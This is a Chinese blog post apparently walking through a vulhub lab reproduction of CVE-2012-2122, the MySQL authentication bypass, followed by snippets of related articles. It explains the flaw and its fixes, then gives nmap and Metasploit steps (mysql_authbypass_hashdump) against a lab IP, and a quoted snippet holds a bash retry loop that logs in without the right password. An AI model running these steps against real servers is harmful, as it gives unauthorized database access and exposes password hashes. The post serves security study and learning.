MySQL身份认证漏洞(CVE-2012-2122漏洞复现

最新推荐文章于 2024-07-06 09:47:56 发布
最新推荐文章于 2024-07-06 09:47:56 发布
阅读量2.9k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48739941/article/details/124107539
版权

(1)漏洞原理

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。

(2)修复

①对数据库进行升级打补丁。

②在防火墙上关闭MySQL端口。

(3)cd vulhub/mysql/CVE-2012-2122 切换目录。

(4)vim docker-compose.yml 修改端口映射。

(5)docker-compose up -d 启动。

(6)netstat -lntp 查看端口。

(7)nmap -T4 -sV -O -p 3307 192.168.81.128 扫描端口。

(8)msfconsole 进入msf。

(9)use auxiliary/scanner/mysql/mysql_authbypass_hashdump 选择模块。

(10)set rhosts 192.168.81.128

set rport 3307

set threads 20

设置目标。

(11)exploit 攻击。

Mysql CVE-2012-2122(vulhub)漏洞复现
MDSEC的博客
08-23 452
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
Mysql 身份认证绕过漏洞CVE-2012-2122复现
最新发布
weixin_57379923的博客
08-09 1048
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2550
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
mysql身份认证绕过漏洞复现CVE-2012-2122
weixin_53730939的博客
03-12 1745
mysql身份认证绕过漏洞复现CVE-2012-2122
Mysql身份认证漏洞复现(CVE-2012-2122)】
qq_61947585的博客
07-06 333
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
Mysql身份认证绕过漏洞复现CVE-2012-2122
m0_74887243的博客
03-21 264
Mysql身份认证绕过漏洞复现CVE-2012-2122
Mysql身份认证绕过漏洞CVE-2012-2122复现
君莫hacker的博客
09-12 2694
0x01 漏洞介绍 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 漏洞编号 CVE-2012-2122 受影响版本 数据库 版本 MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 0x02
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4901
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
Mysql身份验证绕过 漏洞CVE 2012-2122复现
weixin_72146684的博客
08-25 1402
在一个虚拟机中操作。
CVE-2012-2122-mysql未授权访问漏洞复现-vulhub
c0529的博客
06-12 1029
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入使用:kali+vulhub。
vulhub靶场mysql类型CVE-2012-2122漏洞复现
qq_58873970的博客
07-24 878
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
漏洞CVE 2012-2122复现——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 1436
漏洞CVE 2012-2122复现——Mysql身份验证绕过
msyql CVE-2012-2122漏洞复现
qq_46804551的博客
04-29 533
搭建 进入vulhub对应mysql漏洞环境,执行如下命令即可 docker-compose up -d 如上则启动成功 环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。 漏洞复现 在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录: for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306
Mysql 身份认证绕过 CVE-2012-2122 漏洞复现
Senimo
05-03 822
CVE-2012-2122 Mysql 身份认证绕过漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 二、漏洞影响 All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5
复现 CVE2012-2122漏洞 ,用两种攻击方式复现
weixin_64655821的博客
08-26 1061
复现 CVE2012-2122漏洞 ,用两种攻击方式复现 复现mysql 备份上传木马,并用shell工具连接操作
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值